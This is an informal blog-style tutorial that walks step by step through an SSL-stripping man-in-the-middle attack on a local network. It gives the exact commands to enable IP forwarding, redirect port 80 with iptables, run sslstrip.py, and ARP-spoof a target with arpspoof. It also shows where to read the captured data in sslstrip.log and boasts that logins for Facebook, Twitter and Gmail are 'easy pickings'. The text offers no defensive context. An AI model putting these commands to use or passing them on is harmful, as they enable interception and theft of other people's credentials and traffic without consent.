OK,
So I have been wanting to document this for a while, but have failed to do so. Luckily time and the recent BackTrack4 final release have conspired with me today, so I have been able to do it at last. So, sitting comfortably? Here comes the science bit.
Before you do this, I suggest you have the following installed; SSLStrip and Python. Make sure you also have a Linux distribution (such as BackTrack) and hardware combo that supports ARP injection. Once all of that is in place, you can conduct what is a very simple attack. (For reference I use an Acer Aspire One Z250 and Backtrack 4)
- First enable port forwarding with the following command into a terminal window echo “1″ > /proc/sys/net/ipv4/ip_forward
- Then define what traffic you wish to capture (always port 80, I would think) and which port you will forward this traffic to. The values in bold should be replaced with the relevant ports iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port <listenPort>
- You must now use that clever man’s python script to start stripping out the SSL, matching the listenPort with that above python sslstrip.py -l <listenPort>
Having set your machine to pick up, forward and inspect all the traffic from your target machine, we now need to do is ensure that all the traffic from your target machine is routed through your hardware. We do this with a Man In The Middle attack, placing yourself between the target machine and the network router.
We achieve this with a simple ARP attack, which continues to ‘inform’ the target machine that you are the router, with which it wishes to speak.
- Within a new terminal window (to keep it clean, if nothing else), enter the following, (values in bold should be replaced with relevant values) arpspoof -i <interface> -t <targetIP> <gatewayIP>
Now all you need do is wait, all the target machine’s traffic will route though your machine and their browsing will probably seem slow, but any sites which they visit, who implement poor SSL encryption will be easy prey. The data that is captured will be placed into a .log file and available by opening a new terminal and entering more sslstrip.log (ensuring you are in the SSLStrip directory)
You’ll note that such popular sites as www.facebook.com / www.twitter.com and the “newly secure” www.gmail.com are all easy pickings!
I thank you!